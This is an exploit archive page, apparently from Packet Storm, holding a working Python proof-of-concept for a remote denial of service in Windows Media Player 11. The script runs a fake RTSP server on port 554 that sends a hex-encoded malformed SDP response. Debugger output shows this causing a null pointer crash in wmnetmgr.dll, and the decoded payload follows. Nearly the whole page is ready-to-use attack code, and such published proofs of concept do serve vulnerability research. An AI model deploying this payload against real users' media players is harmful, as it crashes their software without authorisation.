exploit the possibilities

Windows Media Player 11.0.5721.5262 Denial Of Service

Windows Media Player 11.0.5721.5262 Denial Of Service
Posted Dec 25, 2011
Authored by Level

Microsoft Windows Media Player version 11.0.5721.5262 remote denial of service exploit.

tags | exploit, remote, denial of service
systems | windows
MD5 | 7c8dc3b91bbeffef4c0e02c1a15be184

Windows Media Player 11.0.5721.5262 Denial Of Service

Change Mirror Download
import socket, binascii
print "\n"
print "----------------------------------------------------------------"
print "| WMP11 Remote Null Pointer |"
print "| Level, Smash the Stack |"
print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |"
print "----------------------------------------------------------------"
print "\n"
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()

#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????

#PAYLOAD#
#RTSP/1.0 208 OK
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable


Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close